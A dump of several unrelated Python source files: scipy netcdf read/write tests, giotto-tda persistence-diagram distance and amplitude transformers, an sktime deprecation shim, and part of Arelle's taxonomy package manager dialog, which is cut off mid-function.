f.variables['testData'][i, :, :] = np.ones((dataSize, dataSize))*i
f.flush()
# Read the file and check that append worked
with netcdf_file('withRecordDimension.nc') as f:
assert_equal(f.variables['time'][-1], i)
assert_equal(f.variables['testData'][-1, :, :].copy(), np.ones((dataSize, dataSize))*i)
assert_equal(f.variables['time'].data.shape[0], i+1)
assert_equal(f.variables['testData'].data.shape[0], i+1)
# Read the file and check that 'data' was not saved as user defined
# attribute of testData variable during append operation
with netcdf_file('withRecordDimension.nc') as f:
with assert_raises(KeyError) as ar:
f.variables['testData']._attributes['data']
ex = ar.exception
assert_equal(ex.args[0], 'data')
def test_maskandscale():
t = np.linspace(20, 30, 15)
t[3] = 100
tm = np.ma.masked_greater(t, 99)
fname = pjoin(TEST_DATA_PATH, 'example_2.nc')
with netcdf_file(fname, maskandscale=True) as f:
Temp = f.variables['Temperature']
assert_equal(Temp.missing_value, 9999)
assert_equal(Temp.add_offset, 20)
assert_equal(Temp.scale_factor, np.float32(0.01))
found = Temp[:].compressed()
del Temp # Remove ref to mmap, so file can be closed.
expected = np.round(tm.compressed(), 2)
assert_allclose(found, expected)
with in_tempdir():
newfname = 'ms.nc'
f = netcdf_file(newfname, 'w', maskandscale=True)
f.createDimension('Temperature', len(tm))
temp = f.createVariable('Temperature', 'i', ('Temperature',))
temp.missing_value = 9999
temp.scale_factor = 0.01
temp.add_offset = 20
temp[:] = tm
f.close()
with netcdf_file(newfname, maskandscale=True) as f:
Temp = f.variables['Temperature']
assert_equal(Temp.missing_value, 9999)
assert_equal(Temp.add_offset, 20)
assert_equal(Temp.scale_factor, np.float32(0.01))
expected = np.round(tm.compressed(), 2)
found = Temp[:].compressed()
del Temp
assert_allclose(found, expected)
# ------------------------------------------------------------------------
# Test reading with masked values (_FillValue / missing_value)
# ------------------------------------------------------------------------
def test_read_withValuesNearFillValue():
# Regression test for ticket #5626
fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')
with netcdf_file(fname, maskandscale=True) as f:
vardata = f.variables['var1_fillval0'][:]
assert_mask_matches(vardata, [False, True, False])
def test_read_withNoFillValue():
# For a variable with no fill value, reading data with maskandscale=True
# should return unmasked data
fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')
with netcdf_file(fname, maskandscale=True) as f:
vardata = f.variables['var2_noFillval'][:]
assert_mask_matches(vardata, [False, False, False])
assert_equal(vardata, [1,2,3])
def test_read_withFillValueAndMissingValue():
# For a variable with both _FillValue and missing_value, the _FillValue
# should be used
IRRELEVANT_VALUE = 9999
fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')
with netcdf_file(fname, maskandscale=True) as f:
vardata = f.variables['var3_fillvalAndMissingValue'][:]
assert_mask_matches(vardata, [True, False, False])
assert_equal(vardata, [IRRELEVANT_VALUE, 2, 3])
def test_read_withMissingValue():
# For a variable with missing_value but not _FillValue, the missing_value
# should be used
fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')
with netcdf_file(fname, maskandscale=True) as f:
vardata = f.variables['var4_missingValue'][:]
assert_mask_matches(vardata, [False, True, False])
def test_read_withFillValNaN():
fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')
with netcdf_file(fname, maskandscale=True) as f:
vardata = f.variables['var5_fillvalNaN'][:]
assert_mask_matches(vardata, [False, True, False])
def test_read_withChar():
fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')
with netcdf_file(fname, maskandscale=True) as f:
vardata = f.variables['var6_char'][:]
assert_mask_matches(vardata, [False, True, False])
def test_read_with2dVar():
fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')
with netcdf_file(fname, maskandscale=True) as f:
vardata = f.variables['var7_2d'][:]
assert_mask_matches(vardata, [[True, False], [False, False], [False, True]])
def test_read_withMaskAndScaleFalse():
# If a variable has a _FillValue (or missing_value) attribute, but is read
# with maskandscale set to False, the result should be unmasked
fname = pjoin(TEST_DATA_PATH, 'example_3_maskedvals.nc')
# Open file with mmap=False to avoid problems with closing a mmap'ed file
# when arrays referring to its data still exist:
with netcdf_file(fname, maskandscale=False, mmap=False) as f:
vardata = f.variables['var3_fillvalAndMissingValue'][:]
assert_mask_matches(vardata, [False, False, False])
assert_equal(vardata, [1, 2, 3])
if __name__ == "__main__":
run_module_suite()
|
py | 1a305550a608959717cee6136d21d1063fef06a4 | # License: Apache 2.0
import numpy as np
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.utils.validation import check_is_fitted
from ._metrics import _parallel_pairwise, _parallel_amplitude
from ._utils import _discretize
from ..utils.validation import check_diagram, validate_params, \
validate_metric_params
class PairwiseDistance(BaseEstimator, TransformerMixin):
"""`Distances <https://www.giotto.ai/theory>`_ between pairs of persistence
diagrams, constructed from the distances between their respective
subdiagrams with constant homology dimension.
Given two collections of persistence diagrams consisting of
birth-death-dimension triples [b, d, q], a collection of distance
matrices or a single distance matrix between pairs of diagrams is
calculated according to the following steps:
1. All diagrams are partitioned into subdiagrams corresponding to
distinct homology dimensions.
2. Pairwise distances between subdiagrams of equal homology
dimension are calculated according to the parameters `metric` and
`metric_params`. This gives a collection of distance matrices,
:math:`\\mathbf{D} = (D_{q_1}, \\ldots, D_{q_n})`.
3. The final result is either :math:`\\mathbf{D}` itself as a
three-dimensional array, or a single distance matrix constructed
by taking norms of the vectors of distances between diagram pairs.
Parameters
----------
metric : ``'bottleneck'`` | ``'wasserstein'`` | ``'landscape'`` | \
``'betti'`` | ``'heat'``, optional, default: ``'bottleneck'``
Distance or dissimilarity function between subdiagrams:
- ``'bottleneck'`` and ``'wasserstein'`` refer to the identically named
perfect-matching--based notions of distance.
- ``'landscape'`` refers to the :math:`L^p` distance between
persistence landscapes.
- ``'betti'`` refers to the :math:`L^p` distance between Betti curves.
- ``'heat'`` refers to the :math:`L^p` distance between
Gaussian-smoothed diagrams.
metric_params : dict or None, optional, default: ``None``
Additional keyword arguments for the metric function:
- If ``metric == 'bottleneck'`` the only argument is `delta` (float,
default: ``0.01``). When equal to ``0.``, an exact algorithm is
used; otherwise, a faster approximate algorithm is used.
- If ``metric == 'wasserstein'`` the available arguments are `p`
(int, default: ``2``) and `delta` (float, default: ``0.01``).
Unlike the case of ``'bottleneck'``, `delta` cannot be set to
``0.`` and an exact algorithm is not available.
- If ``metric == 'betti'`` the available arguments are `p` (float,
default: ``2.``) and `n_values` (int, default: ``100``).
- If ``metric == 'landscape'`` the available arguments are `p`
(float, default: ``2.``), `n_values` (int, default: ``100``) and
`n_layers` (int, default: ``1``).
- If ``metric == 'heat'`` the available arguments are `p`
(float, default: ``2.``), `sigma` (float, default: ``1.``) and
`n_values` (int, default: ``100``).
order : float or None, optional, default: ``2.``
If ``None``, :meth:`transform` returns for each pair of diagrams a
vector of distances corresponding to the dimensions in
:attr:`homology_dimensions_`. Otherwise, the :math:`p`-norm of
these vectors with :math:`p` equal to `order` is taken.
n_jobs : int or None, optional, default: ``None``
The number of jobs to use for the computation. ``None`` means 1 unless
in a :obj:`joblib.parallel_backend` context. ``-1`` means using all
processors.
Attributes
----------
effective_metric_params_ : dict
Dictionary containing all information present in `metric_params` as
well as on any relevant quantities computed in :meth:`fit`.
homology_dimensions_ : list
Homology dimensions seen in :meth:`fit`, sorted in ascending order.
See also
--------
Amplitude, BettiCurve, PersistenceLandscape, HeatKernel, \
giotto.homology.VietorisRipsPersistence
Notes
-----
To compute distances without first splitting the computation between
different homology dimensions, data should be first transformed by an
instance of :class:`ForgetDimension`.
`Hera <https://bitbucket.org/grey_narn/hera>`_ is used as a C++ backend
for computing bottleneck and Wasserstein distances between persistence
diagrams.
"""
_hyperparameters = {'order': [float, (1, np.inf)]}
def __init__(self, metric='landscape', metric_params=None, order=2.,
n_jobs=None):
self.metric = metric
self.metric_params = metric_params
self.order = order
self.n_jobs = n_jobs
def fit(self, X, y=None):
"""Store all observed homology dimensions in
:attr:`homology_dimensions_` and compute
:attr:`effective_metric_params`. Then, return the estimator.
This method is there to implement the usual scikit-learn API and hence
work in pipelines.
Parameters
----------
X : ndarray, shape (n_samples_fit, n_features, 3)
Input data. Array of persistence diagrams, each a collection of
triples [b, d, q] representing persistent topological features
through their birth (b), death (d) and homology dimension (q).
y : None
There is no need for a target in a transformer, yet the pipeline
API requires this parameter.
Returns
-------
self : object
"""
X = check_diagram(X)
if self.metric_params is None:
self.effective_metric_params_ = {}
else:
self.effective_metric_params_ = self.metric_params.copy()
hyperparameters = self.get_params().copy()
if self.order is not None:
if isinstance(self.order, int):
hyperparameters['order'] = float(self.order)
else:
hyperparameters['order'] = 1. # Automatically pass validate_params
validate_params(hyperparameters, self._hyperparameters)
validate_metric_params(self.metric, self.effective_metric_params_)
self.homology_dimensions_ = sorted(set(X[0, :, 2]))
if self.metric in ['landscape', 'heat', 'betti']:
self.effective_metric_params_['samplings'], \
self.effective_metric_params_['step_sizes'] = \
_discretize(X, **self.effective_metric_params_)
self._X = X
return self
def transform(self, X, y=None):
"""Computes a distance or vector of distances between the diagrams in
`X` and the diagrams seen in :meth:`fit`.
Parameters
----------
X : ndarray, shape (n_samples, n_features, 3)
Input data. Array of persistence diagrams, each a collection of
triples [b, d, q] representing persistent topological features
through their birth (b), death (d) and homology dimension (q).
y : None
There is no need for a target in a transformer, yet the pipeline
API requires this parameter.
Returns
-------
Xt : ndarray, shape (n_samples_fit, n_samples, n_homology_dimensions) \
if `order` is ``None``, else (n_samples_fit, n_samples)
Distance matrix or collection of distance matrices between
diagrams in `X` and diagrams seen in :meth:`fit`. In the
second case, index i along axis 2 corresponds to the i-th
homology dimension in :attr:`homology_dimensions_`.
"""
check_is_fitted(self, ['effective_metric_params_',
'homology_dimensions_'])
X = check_diagram(X)
if np.array_equal(X, self._X):
X2 = None
else:
X2 = X
Xt = _parallel_pairwise(self._X, X2, self.metric,
self.effective_metric_params_,
self.homology_dimensions_,
self.n_jobs)
if self.order is not None:
Xt = np.linalg.norm(Xt, axis=2, ord=self.order)
return Xt
class Amplitude(BaseEstimator, TransformerMixin):
"""`Amplitudes <https://www.giotto.ai/theory>`_ of persistence diagrams,
constructed from the amplitudes of their subdiagrams with constant
homology dimension.
Given a single persistence diagram consisting of birth-death-dimension
triples [b, d, q], a vector of amplitudes or a single scalar amplitude is
calculated according to the following steps:
1. All diagrams are partitioned into subdiagrams corresponding to
distinct homology dimensions.
2. The amplitude of each subdiagram is calculated according to the
parameters `metric` and `metric_params`. This gives a vector of
amplitudes, :math:`\\mathbf{a} = (a_{q_1}, \\ldots, a_{q_n})`.
3. The final result is either :math:`\\mathbf{a}` itself or
a norm of :math:`\\mathbf{a}`.
Parameters
----------
metric : ``'bottleneck'`` | ``'wasserstein'`` | ``'landscape'`` | \
``'betti'`` | ``'heat'``, optional, default: ``'bottleneck'``
Distance or dissimilarity function used to define the amplitude of
a subdiagram as its distance from the diagonal diagram:
- ``'bottleneck'`` and ``'wasserstein'`` refer to the identically named
perfect-matching--based notions of distance.
- ``'landscape'`` refers to the :math:`L^p` distance between
persistence landscapes.
- ``'betti'`` refers to the :math:`L^p` distance between Betti curves.
- ``'heat'`` refers to the :math:`L^p` distance between
Gaussian-smoothed diagrams.
metric_params : dict or None, optional, default: ``None``
Additional keyword arguments for the metric function:
- If ``metric == 'bottleneck'`` there are no available arguments.
- If ``metric == 'wasserstein'`` the only argument is `p` (int,
default: ``2``).
- If ``metric == 'betti'`` the available arguments are `p` (float,
default: ``2.``) and `n_values` (int, default: ``100``).
- If ``metric == 'landscape'`` the available arguments are `p`
(float, default: ``2.``), `n_values` (int, default: ``100``) and
`n_layers` (int, default: ``1``).
- If ``metric == 'heat'`` the available arguments are `p` (float,
default: ``2.``), `sigma` (float, default: ``1.``) and `n_values`
(int, default: ``100``).
order : float or None, optional, default: ``2.``
If ``None``, :meth:`transform` returns for each diagram a vector of
amplitudes corresponding to the dimensions in
:attr:`homology_dimensions_`. Otherwise, the :math:`p`-norm of
these vectors with :math:`p` equal to `order` is taken.
n_jobs : int or None, optional, default: ``None``
The number of jobs to use for the computation. ``None`` means 1 unless
in a :obj:`joblib.parallel_backend` context. ``-1`` means using all
processors.
Attributes
----------
effective_metric_params_ : dict
Dictionary containing all information present in `metric_params` as
well as on any relevant quantities computed in :meth:`fit`.
homology_dimensions_ : list
Homology dimensions seen in :meth:`fit`, sorted in ascending order.
See also
--------
PairwiseDistance, Scaler, Filtering, \
BettiCurve, PersistenceLandscape, \
HeatKernel, giotto.homology.VietorisRipsPersistence
Notes
-----
To compute amplitudes without first splitting the computation between
different homology dimensions, data should be first transformed by an
instance of :class:`ForgetDimension`.
"""
_hyperparameters = {'order': [float, (1, np.inf)]}
def __init__(self, metric='landscape', metric_params=None, order=2.,
n_jobs=None):
self.metric = metric
self.metric_params = metric_params
self.order = order
self.n_jobs = n_jobs
def fit(self, X, y=None):
"""Store all observed homology dimensions in
:attr:`homology_dimensions_` and compute
:attr:`effective_metric_params`. Then, return the estimator.
This method is there to implement the usual scikit-learn API and hence
work in pipelines.
Parameters
----------
X : ndarray, shape (n_samples, n_features, 3)
Input data. Array of persistence diagrams, each a collection of
triples [b, d, q] representing persistent topological features
through their birth (b), death (d) and homology dimension (q).
y : None
There is no need for a target in a transformer, yet the pipeline
API requires this parameter.
Returns
-------
self : object
"""
if self.metric_params is None:
self.effective_metric_params_ = {}
else:
self.effective_metric_params_ = self.metric_params.copy()
hyperparameters = self.get_params().copy()
if self.order is not None:
if isinstance(self.order, int):
hyperparameters['order'] = float(self.order)
else:
hyperparameters['order'] = 1. # Automatically pass validate_params
validate_params(hyperparameters, self._hyperparameters)
validate_metric_params(self.metric, self.effective_metric_params_)
X = check_diagram(X)
self.homology_dimensions_ = sorted(set(X[0, :, 2]))
if self.metric in ['landscape', 'heat', 'betti']:
self.effective_metric_params_['samplings'], \
self.effective_metric_params_['step_sizes'] = \
_discretize(X, **self.effective_metric_params_)
return self
def transform(self, X, y=None):
"""Compute the amplitudes or amplitude vectors of diagrams in `X`.
Parameters
----------
X : ndarray, shape (n_samples, n_features, 3)
Input data. Array of persistence diagrams, each a collection of
triples [b, d, q] representing persistent topological features
through their birth (b), death (d) and homology dimension (q).
y : None
There is no need for a target in a transformer, yet the pipeline
API requires this parameter.
Returns
-------
Xt : ndarray, shape (n_samples, n_homology_dimensions) if `order` \
is ``None``, else (n_samples, 1)
Amplitudes or amplitude vectors of the diagrams in `X`. In the
second case, index i along axis 1 corresponds to the i-th
homology dimension in :attr:`homology_dimensions_`.
"""
check_is_fitted(self, ['effective_metric_params_',
'homology_dimensions_'])
X = check_diagram(X)
Xt = _parallel_amplitude(X, self.metric,
self.effective_metric_params_,
self.homology_dimensions_,
self.n_jobs)
if self.order is None:
return Xt
Xt = np.linalg.norm(Xt, axis=1, ord=self.order).reshape(-1, 1)
return Xt
|
py | 1a30555e91c7bf3a42ad1f0b9aaf106f7a2e35f7 | #!/usr/bin/env python3 -u
# -*- coding: utf-8 -*-
# copyright: sktime developers, BSD-3-Clause License (see LICENSE file)
"""Implement transformers for summarizing a time series."""
import warnings
from sktime.transformations.series.summarize import WindowSummarizer
__all__ = ["WindowSummarizer"]
warnings.warn(
"WindowSummarizer has been moved to transformations.series.summarize,"
+ " the old location in series.windows_summarize is deprecated since 0.11.0,"
+ " and will be removed in 0.12.0. Please use the import from "
+ "transformations.series.summarize import WindowSummarizer."
)
|
py | 1a30557d6404dbdd5f998bc2c989ed340e1a804c | '''
Created on Oct 6, 2013 (from DialogPluginManager.py)
@author: Mark V Systems Limited
(c) Copyright 2013 Mark V Systems Limited, All rights reserved.
'''
from tkinter import simpledialog, Toplevel, font, messagebox, VERTICAL, HORIZONTAL, N, S, E, W
from tkinter.constants import DISABLED, ACTIVE
try:
from tkinter.ttk import Treeview, Scrollbar, Frame, Label, Button
except ImportError:
from ttk import Treeview, Scrollbar, Frame, Label, Button
from arelle import PackageManager, DialogURL
from arelle.CntlrWinTooltip import ToolTip
import os, time
try:
import regex as re
except ImportError:
import re
def dialogPackageManager(mainWin):
# check for updates in background
import threading
thread = threading.Thread(target=lambda cntlr=mainWin: backgroundCheckForUpdates(cntlr))
thread.daemon = True
thread.start()
def backgroundCheckForUpdates(cntlr):
cntlr.showStatus(_("Checking for updates to packages")) # clear web loading status
packageNamesWithNewerFileDates = PackageManager.packageNamesWithNewerFileDates()
if packageNamesWithNewerFileDates:
cntlr.showStatus(_("Updates are available for these packages: {0}")
.format(', '.join(packageNamesWithNewerFileDates)), clearAfter=5000)
else:
cntlr.showStatus(_("No updates found for packages."), clearAfter=5000)
time.sleep(0.1) # Mac locks up without this, may be needed for empty ui queue?
cntlr.uiThreadQueue.put((DialogPackageManager, [cntlr, packageNamesWithNewerFileDates]))
class DialogPackageManager(Toplevel):
def __init__(self, mainWin, packageNamesWithNewerFileDates):
super(DialogPackageManager, self).__init__(mainWin.parent)
self.ENABLE = _("Enable")
self.DISABLE = _("Disable")
self.parent = mainWin.parent
self.cntlr = mainWin
# copy plugins for temporary display
self.packagesConfig = PackageManager.packagesConfig
self.packagesConfigChanged = False
self.packageNamesWithNewerFileDates = packageNamesWithNewerFileDates
parentGeometry = re.match("(\d+)x(\d+)[+]?([-]?\d+)[+]?([-]?\d+)", self.parent.geometry())
dialogX = int(parentGeometry.group(3))
dialogY = int(parentGeometry.group(4))
self.title(_("Taxonomy Packages Manager"))
frame = Frame(self)
# left button frame
buttonFrame = Frame(frame, width=40)
buttonFrame.columnconfigure(0, weight=1)
addLabel = Label(buttonFrame, text=_("Find taxonomy packages:"), wraplength=64, justify="center")
addLocalButton = Button(buttonFrame, text=_("Locally"), command=self.findLocally)
ToolTip(addLocalButton, text=_("File chooser allows selecting taxonomy packages to add (or reload), from the local file system. "
"Select either a PWD or prior taxonomy package zip file, or a taxonomy manifest (.taxonomyPackage.xml) within an unzipped taxonomy package. "), wraplength=360)
addWebButton = Button(buttonFrame, text=_("On Web"), command=self.findOnWeb)
ToolTip(addWebButton, text=_("Dialog to enter URL full path to load (or reload) package, from the web or local file system. "
"URL may be either a PWD or prior taxonomy package zip file, or a taxonomy manifest (.taxonomyPackage.xml) within an unzipped taxonomy package. "), wraplength=360)
manifestNameButton = Button(buttonFrame, text=_("Manifest"), command=self.manifestName)
ToolTip(manifestNameButton, text=_("Provide pre-PWD non-standard archive manifest file name pattern (e.g., *taxonomyPackage.xml). "
"Uses unix file name pattern matching. "
"Multiple manifest files are supported in pre-PWD archives (such as oasis catalogs). "
"(Replaces pre-PWD search for either .taxonomyPackage.xml or catalog.xml). "), wraplength=480)
self.manifestNamePattern = ""
addLabel.grid(row=0, column=0, pady=4)
addLocalButton.grid(row=1, column=0, pady=4)
addWebButton.grid(row=2, column=0, pady=4)
manifestNameButton.grid(row=3, column=0, pady=4)
buttonFrame.grid(row=0, column=0, rowspan=3, sticky=(N, S, W), padx=3, pady=3)
# right tree frame (packages already known to arelle)
packagesFrame = Frame(frame, width=700)
vScrollbar = Scrollbar(packagesFrame, orient=VERTICAL)
hScrollbar = Scrollbar(packagesFrame, orient=HORIZONTAL)
self.packagesView = Treeview(packagesFrame, xscrollcommand=hScrollbar.set, yscrollcommand=vScrollbar.set, height=7)
self.packagesView.grid(row=0, column=0, sticky=(N, S, E, W))
self.packagesView.bind('<<TreeviewSelect>>', self.packageSelect)
hScrollbar["command"] = self.packagesView.xview
hScrollbar.grid(row=1, column=0, sticky=(E,W))
vScrollbar["command"] = self.packagesView.yview
vScrollbar.grid(row=0, column=1, sticky=(N,S))
packagesFrame.columnconfigure(0, weight=1)
packagesFrame.rowconfigure(0, weight=1)
packagesFrame.grid(row=0, column=1, columnspan=4, sticky=(N, S, E, W), padx=3, pady=3)
self.packagesView.focus_set()
self.packagesView.column("#0", width=120, anchor="w")
self.packagesView.heading("#0", text=_("Name"))
self.packagesView["columns"] = ("ver", "status", "date", "update", "descr")
self.packagesView.column("ver", width=150, anchor="w", stretch=False)
self.packagesView.heading("ver", text=_("Version"))
self.packagesView.column("status", width=50, anchor="w", stretch=False)
self.packagesView.heading("status", text=_("Status"))
self.packagesView.column("date", width=170, anchor="w", stretch=False)
self.packagesView.heading("date", text=_("File Date"))
self.packagesView.column("update", width=50, anchor="w", stretch=False)
self.packagesView.heading("update", text=_("Update"))
self.packagesView.column("descr", width=200, anchor="w", stretch=False)
self.packagesView.heading("descr", text=_("Description"))
remappingsFrame = Frame(frame)
vScrollbar = Scrollbar(remappingsFrame, orient=VERTICAL)
hScrollbar = Scrollbar(remappingsFrame, orient=HORIZONTAL)
self.remappingsView = Treeview(remappingsFrame, xscrollcommand=hScrollbar.set, yscrollcommand=vScrollbar.set, height=5)
self.remappingsView.grid(row=0, column=0, sticky=(N, S, E, W))
hScrollbar["command"] = self.remappingsView.xview
hScrollbar.grid(row=1, column=0, sticky=(E,W))
vScrollbar["command"] = self.remappingsView.yview
vScrollbar.grid(row=0, column=1, sticky=(N,S))
remappingsFrame.columnconfigure(0, weight=1)
remappingsFrame.rowconfigure(0, weight=1)
remappingsFrame.grid(row=1, column=1, columnspan=4, sticky=(N, S, E, W), padx=3, pady=3)
self.remappingsView.focus_set()
self.remappingsView.column("#0", width=200, anchor="w")
self.remappingsView.heading("#0", text=_("Prefix"))
self.remappingsView["columns"] = ("remapping")
self.remappingsView.column("remapping", width=500, anchor="w", stretch=False)
self.remappingsView.heading("remapping", text=_("Remapping"))
# bottom frame package info details
packageInfoFrame = Frame(frame, width=700)
packageInfoFrame.columnconfigure(1, weight=1)
self.packageNameLabel = Label(packageInfoFrame, wraplength=600, justify="left",
font=font.Font(family='Helvetica', size=12, weight='bold'))
self.packageNameLabel.grid(row=0, column=0, columnspan=6, sticky=W)
self.packageVersionHdr = Label(packageInfoFrame, text=_("version:"), state=DISABLED)
self.packageVersionHdr.grid(row=1, column=0, sticky=W)
self.packageVersionLabel = Label(packageInfoFrame, wraplength=600, justify="left")
self.packageVersionLabel.grid(row=1, column=1, columnspan=5, sticky=W)
self.packageDescrHdr = Label(packageInfoFrame, text=_("description:"), state=DISABLED)
self.packageDescrHdr.grid(row=2, column=0, sticky=W)
self.packageDescrLabel = Label(packageInfoFrame, wraplength=600, justify="left")
self.packageDescrLabel.grid(row=2, column=1, columnspan=5, sticky=W)
self.packagePrefixesHdr = Label(packageInfoFrame, text=_("prefixes:"), state=DISABLED)
self.packagePrefixesHdr.grid(row=3, column=0, sticky=W)
self.packagePrefixesLabel = Label(packageInfoFrame, wraplength=600, justify="left")
self.packagePrefixesLabel.grid(row=3, column=1, columnspan=5, sticky=W)
ToolTip(self.packagePrefixesLabel, text=_("List of prefixes that this package remaps."), wraplength=240)
self.packageUrlHdr = Label(packageInfoFrame, text=_("URL:"), state=DISABLED)
self.packageUrlHdr.grid(row=4, column=0, sticky=W)
self.packageUrlLabel = Label(packageInfoFrame, wraplength=600, justify="left")
self.packageUrlLabel.grid(row=4, column=1, columnspan=5, sticky=W)
ToolTip(self.packageUrlLabel, text=_("URL of taxonomy package (local file path or web loaded file)."), wraplength=240)
self.packageDateHdr = Label(packageInfoFrame, text=_("date:"), state=DISABLED)
self.packageDateHdr.grid(row=5, column=0, sticky=W)
self.packageDateLabel = Label(packageInfoFrame, wraplength=600, justify="left")
self.packageDateLabel.grid(row=5, column=1, columnspan=5, sticky=W)
ToolTip(self.packageDateLabel, text=_("Date of currently loaded package file (with parenthetical node when an update is available)."), wraplength=240)
self.packageEnableButton = Button(packageInfoFrame, text=self.ENABLE, state=DISABLED, command=self.packageEnable)
ToolTip(self.packageEnableButton, text=_("Enable/disable package."), wraplength=240)
self.packageEnableButton.grid(row=6, column=1, sticky=E)
self.packageMoveUpButton = Button(packageInfoFrame, text=_("Move Up"), state=DISABLED, command=self.packageMoveUp)
ToolTip(self.packageMoveUpButton, text=_("Move package up (above other remappings)."), wraplength=240)
self.packageMoveUpButton.grid(row=6, column=2, sticky=E)
self.packageMoveDownButton = Button(packageInfoFrame, text=_("Move Down"), state=DISABLED, command=self.packageMoveDown)
ToolTip(self.packageMoveDownButton, text=_("Move package down (below other remappings)."), wraplength=240)
self.packageMoveDownButton.grid(row=6, column=3, sticky=E)
self.packageReloadButton = Button(packageInfoFrame, text=_("Reload"), state=DISABLED, command=self.packageReload)
ToolTip(self.packageReloadButton, text=_("Reload/update package."), wraplength=240)
self.packageReloadButton.grid(row=6, column=4, sticky=E)
self.packageRemoveButton = Button(packageInfoFrame, text=_("Remove"), state=DISABLED, command=self.packageRemove)
ToolTip(self.packageRemoveButton, text=_("Remove package from packages table (does not erase the package file)."), wraplength=240)
self.packageRemoveButton.grid(row=6, column=5, sticky=E)
packageInfoFrame.grid(row=2, column=0, columnspan=5, sticky=(N, S, E, W), padx=3, pady=3)
packageInfoFrame.config(borderwidth=4, relief="groove")
okButton = Button(frame, text=_("Close"), command=self.ok)
ToolTip(okButton, text=_("Accept and changes (if any) and close dialog."), wraplength=240)
cancelButton = Button(frame, text=_("Cancel"), command=self.close)
ToolTip(cancelButton, text=_("Cancel changes (if any) and close dialog."), wraplength=240)
okButton.grid(row=3, column=3, sticky=(S,E), pady=3)
cancelButton.grid(row=3, column=4, sticky=(S,E), pady=3, padx=3)
enableDisableFrame = Frame(frame)
enableDisableFrame.grid(row=3, column=1, sticky=(S,W), pady=3)
enableAllButton = Button(enableDisableFrame, text=_("Enable All"), command=self.enableAll)
ToolTip(enableAllButton, text=_("Enable all packages."), wraplength=240)
disableAllButton = Button(enableDisableFrame, text=_("Disable All"), command=self.disableAll)
ToolTip(disableAllButton, text=_("Disable all packages."), wraplength=240)
enableAllButton.grid(row=1, column=1)
disableAllButton.grid(row=1, column=2)
self.loadTreeViews()
self.geometry("+{0}+{1}".format(dialogX+50,dialogY+100))
frame.grid(row=0, column=0, sticky=(N,S,E,W))
frame.columnconfigure(0, weight=0)
frame.columnconfigure(1, weight=1)
frame.rowconfigure(0, weight=1)
window = self.winfo_toplevel()
window.columnconfigure(0, weight=1)
window.rowconfigure(0, weight=1)
self.bind("<Return>", self.ok)
self.bind("<Escape>", self.close)
self.protocol("WM_DELETE_WINDOW", self.close)
self.grab_set()
self.wait_window(self)
def loadTreeViews(self):
self.selectedModule = None
# clear previous treeview entries
for previousNode in self.packagesView.get_children(""):
self.packagesView.delete(previousNode)
for i, packageInfo in enumerate(self.packagesConfig.get("packages", [])):
name = packageInfo.get("name", "package{}".format(i))
node = self.packagesView.insert("", "end", "_{}".format(i), text=name)
self.packagesView.set(node, "ver", packageInfo.get("version"))
self.packagesView.set(node, "status", packageInfo.get("status"))
self.packagesView.set(node, "date", packageInfo.get("fileDate"))
if name in self.packageNamesWithNewerFileDates:
self.packagesView.set(node, "update", _("available"))
self.packagesView.set(node, "descr", packageInfo.get("description"))
# clear previous treeview entries
for previousNode in self.remappingsView.get_children(""):
self.remappingsView.delete(previousNode)
for i, remappingItem in enumerate(sorted(self.packagesConfig.get("remappings", {}).items())):
prefix, remapping = remappingItem
node = self.remappingsView.insert("", "end", prefix, text=prefix)
self.remappingsView.set(node, "remapping", remapping)
self.packageSelect() # clear out prior selection
def ok(self, event=None):
if self.packagesConfigChanged:
PackageManager.packagesConfig = self.packagesConfig
PackageManager.packagesConfigChanged = True
self.cntlr.onPackageEnablementChanged()
self.close()
def close(self, event=None):
self.parent.focus_set()
self.destroy()
def packageSelect(self, *args):
node = (self.packagesView.selection() or (None,))[0]
try:
nodeIndex = int(node[1:])
except (ValueError, TypeError):
nodeIndex = -1
if 0 <= nodeIndex < len(self.packagesConfig["packages"]):
packageInfo = self.packagesConfig["packages"][nodeIndex]
self.selectedPackageIndex = nodeIndex
name = packageInfo["name"]
self.packageNameLabel.config(text=name)
self.packageVersionHdr.config(state=ACTIVE)
self.packageVersionLabel.config(text=packageInfo["version"])
self.packageDescrHdr.config(state=ACTIVE)
self.packageDescrLabel.config(text=packageInfo["description"])
self.packagePrefixesHdr.config(state=ACTIVE)
self.packagePrefixesLabel.config(text=', '.join(packageInfo["remappings"].keys()))
self.packageUrlHdr.config(state=ACTIVE)
self.packageUrlLabel.config(text=packageInfo["URL"])
self.packageDateHdr.config(state=ACTIVE)
self.packageDateLabel.config(text=packageInfo["fileDate"] + " " +
(_("(an update is available)") if name in self.packageNamesWithNewerFileDates else ""))
self.packageEnableButton.config(state=ACTIVE,
text={"enabled":self.DISABLE,
"disabled":self.ENABLE}[packageInfo["status"]])
self.packageMoveUpButton.config(state=ACTIVE if 0 < nodeIndex else DISABLED)
self.packageMoveDownButton.config(state=ACTIVE if nodeIndex < (len(self.packagesConfig["packages"]) - 1) else DISABLED)
self.packageReloadButton.config(state=ACTIVE)
self.packageRemoveButton.config(state=ACTIVE)
else:
self.selectedPackageIndex = -1
self.packageNameLabel.config(text="")
self.packageVersionHdr.config(state=DISABLED)
self.packageVersionLabel.config(text="")
self.packageDescrHdr.config(state=DISABLED)
self.packageDescrLabel.config(text="")
self.packagePrefixesHdr.config(state=DISABLED)
self.packagePrefixesLabel.config(text="")
self.packageUrlHdr.config(state=DISABLED)
self.packageUrlLabel.config(text="")
self.packageDateHdr.config(state=DISABLED)
self.packageDateLabel.config(text="")
self.packageEnableButton.config(state=DISABLED, text=self.ENABLE)
self.packageMoveUpButton.config(state=DISABLED)
self.packageMoveDownButton.config(state=DISABLED)
self.packageReloadButton.config(state=DISABLED)
self.packageRemoveButton.config(state=DISABLED)
def findLocally(self):
initialdir = self.cntlr.pluginDir # default plugin directory
if not self.cntlr.isMac: # can't navigate within app easily, always start in default directory
initialdir = self.cntlr.config.setdefault("packageOpenDir", initialdir)
filename = self.cntlr.uiFileDialog("open",
parent=self,
title=_("Choose taxonomy package file"),
initialdir=initialdir,
filetypes=[(_("Taxonomy package files (*.zip)"), "*.zip"),
